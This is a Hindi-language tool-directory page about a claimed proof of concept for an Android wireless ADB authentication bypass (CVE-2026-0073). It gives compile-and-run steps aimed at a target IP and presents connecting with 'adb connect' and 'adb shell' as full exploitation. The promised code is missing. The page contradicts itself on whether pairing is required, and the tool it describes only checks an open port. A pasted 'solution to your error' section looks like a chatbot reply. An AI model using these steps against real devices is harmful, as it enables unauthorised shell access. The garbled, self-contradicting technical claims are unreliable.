Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-0073 — CVE-2026-0073 | Kitploit
उपकरण/GitHubGitHub/0xblackash/cve-2026-0073
एंड्रॉइड सुरक्षाभेद्यता विश्लेषणशोषणवायरलेस सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHub0xblackash/cve-2026-0073

CVE-2026-0073

CVE-2026-0073

रिपॉजिटरी देखें
51484 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🤖 CVE-2026-0073 - वायरलेस ADB प्रमाणीकरण बाईपास

ChatGPT Image May 7, 2026, 03_05_19 PM

Critical Android Type


📌 अवलोकन

CVE-2026-0073 एंड्रॉइड के वायरलेस ADB (adbd डेमन) में एक गंभीर प्रमाणीकरण बाईपास भेद्यता है।

समान नेटवर्क पर मौजूद एक हमलावर पारस्परिक TLS प्रमाणीकरण को बाईपास कर सकता है और उपयोगकर्ता की अनुमति या पिछली पेयरिंग के बिना डिवाइस से कनेक्ट हो सकता है।

मुख्य जानकारी

आइटमविवरण
CVE IDCVE-2026-0073
गंभीरतागंभीर
CVSS स्कोर8.8
प्रभावित घटकadbd (Android Debug Bridge) - TLS हैंडलर
प्रकारप्रमाणीकरण बाईपास
प्रभावरिमोट शेल एक्सेस (shell उपयोगकर्ता)
पैच किया गयामई 2026 Android सुरक्षा बुलेटिन

🛠 प्रभावित संस्करण

  • Android 14
  • Android 15
  • Android 16
  • Android 16 QPR2

इसमें ठीक किया गया: सुरक्षा पैच स्तर 2026-05-01 और उसके बाद।


🎯 हमले की आवश्यकताएँ

  • लक्ष्य डिवाइस में वायरलेस डिबगिंग सक्षम होनी चाहिए
  • हमलावर को समान Wi-Fi नेटवर्क पर होना चाहिए
  • डेवलपर विकल्प सक्षम हों (कई डिवाइसों पर सामान्य)
  • डिवाइस पहले कम से कम एक बार ADB के साथ पेयर हो चुका हो

⚠️ प्रभाव

  • कोई उपयोगकर्ता इंटरैक्शन आवश्यक नहीं
  • हमलावर पूर्ण ADB शेल प्राप्त कर सकता है
  • ऐप्स इंस्टॉल कर सकता है, डेटा निकाल सकता है, shell उपयोगकर्ता के रूप में कमांड चला सकता है
  • यदि अन्य भेद्यताएँ मौजूद हैं तो आगे विशेषाधिकार बढ़ा सकता है
  • विशेष रूप से एंटरप्राइज़, डेवलपर और परीक्षण वातावरण में खतरनाक

🛡️ शमन

  • मई 2026 सुरक्षा पैच या नए में अपडेट करें
  • उपयोग में न होने पर वायरलेस डिबगिंग बंद कर दें
  • सार्वजनिक/अविश्वसनीय नेटवर्क पर वायरलेस ADB सक्षम करने से बचें
  • जब संभव हो वायरलेस के बजाय USB ADB का उपयोग करें

🧪 PoC स्थिति

  • सार्वजनिक PoC उपलब्ध हैं
  • सरल संस्करण प्रमाणपत्र बाईपास के साथ संशोधित ADB क्लाइंट का उपयोग करता है
  • adbd_tls_verify_cert() में तर्क दोष का शोषण करके काम करता है

✅ आपकी त्रुटि का समाधान

यह त्रुटि इसलिए होती है क्योंकि फ़ाइल CVE-2026-0073-Checker.cpp अभी तक मौजूद नहीं है।


चरण-दर-चरण समाधान:

  1. फ़ाइल बनाएँ इस कमांड से:
root@kitploit:~
nano CVE-2026-0073-Checker.cpp
  1. नीचे दिए गए पूरे कोड को एडिटर में कॉपी और पेस्ट करें:

  2. सेव करें और बाहर निकलें (Ctrl + X → Y → Enter)

  3. फिर से कंपाइल करें:

root@kitploit:~
g++ -o CVE-2026-0073 CVE-2026-0073-Checker.cpp -lssl -lcrypto -Wall -O2
  1. इसे चलाएँ:
root@kitploit:~
./CVE-2026-0073 192.168.1.105

✅ एक्सप्लॉइट

यहाँ ठीक वही दिखाया गया है जो आप देखेंगे यदि C++ प्रोग्राम किसी भेद्य Android डिवाइस पर सफलतापूर्वक काम करता है:

अपेक्षित सफल आउटपुट:

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║                CVE-2026-0073  PoC Checker                    ║
║         Android Wireless ADB Authentication Bypass           ║
╚══════════════════════════════════════════════════════════════╝

Target : 192.168.1.105

[*] Checking 192.168.1.105:5555 → OPEN

[!] Wireless ADB Port is Open!
[!] High chance of being vulnerable to CVE-2026-0073

Next Steps:
   1. adb connect 192.168.1.105:5555
   2. adb shell

इसका क्या अर्थ है:

  • OPEN हरे रंग में → ADB पोर्ट सुन रहा है।
  • प्रोग्राम ने पता लगाया कि वायरलेस डिबगिंग सक्षम है।
  • इसका मतलब है कि डिवाइस के CVE-2026-0073 के साथ शोषणीय होने की उच्च संभावना है।

अगला वास्तविक परीक्षण (C++ टूल चलाने के बाद):

ये कमांड चलाएँ:

root@kitploit:~
adb connect 192.168.1.105:5555

यदि यह दिखाता है:

root@kitploit:~
connected to 192.168.1.105:5555

फिर टाइप करें:

root@kitploit:~
adb shell

आपको डिवाइस के अंदर पहुँच जाना चाहिए:

root@kitploit:~
pixel8:/ $ 

यह पूर्ण सफल शोषण है।


⚠️ अस्वीकरण

यह PoC केवल शैक्षिक और अधिकृत परीक्षण के लिए है।

आप इस टूल का उपयोग केवल उन डिवाइसों पर कर सकते हैं जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है। अनधिकृत उपयोग अवैध है और सख्त रूप से निषिद्ध है।

अपने जोखिम पर उपयोग करें। लेखक किसी भी क्षति या कानूनी परिणामों के लिए ज़िम्मेदार नहीं है।


🎯 सावधानी के साथ बनाया गया — केवल अधिकृत डिवाइसों पर उपयोग करें।

टूल डाउनलोड करें